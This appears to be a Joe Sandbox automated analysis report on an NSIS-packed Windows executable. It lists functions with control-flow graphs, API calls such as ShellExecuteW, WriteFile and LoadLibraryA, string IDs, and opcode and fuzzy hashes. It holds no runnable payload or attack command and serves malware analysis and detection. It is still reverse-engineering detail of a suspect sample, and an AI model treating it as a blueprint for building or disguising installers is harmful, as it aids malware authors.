                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                            • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                            • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                            Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                            • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                            Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                            • String ID: %MxBearing%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                            • API String ID: 247603264-2396929154
                                                                                                                                                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                            Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                            • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                            Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                            • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                            • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                            Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                            • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                            • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                            Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                            • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                            Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                            • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                            Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                            • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                            Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
